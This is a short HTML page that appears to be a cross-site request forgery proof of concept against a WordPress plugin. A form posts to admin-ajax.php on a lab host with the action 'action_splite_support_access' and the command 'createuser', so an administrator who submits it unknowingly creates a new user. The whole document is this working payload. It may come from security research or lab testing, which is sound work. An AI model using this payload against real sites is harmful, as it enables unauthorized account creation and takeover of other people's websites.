<!DOCTYPE html>
<html>
	<head>
		<title>Form page</title>
	</head>
	<body>
		<form method="POST" action="http://wordpress.lab/wp-admin/admin-ajax.php">
            <input type="text" name="action" value="action_splite_support_access">
            <input type="text" name="todo" value="createuser">
            <input type="submit" value="click">
		</form>
	</body>

</html>
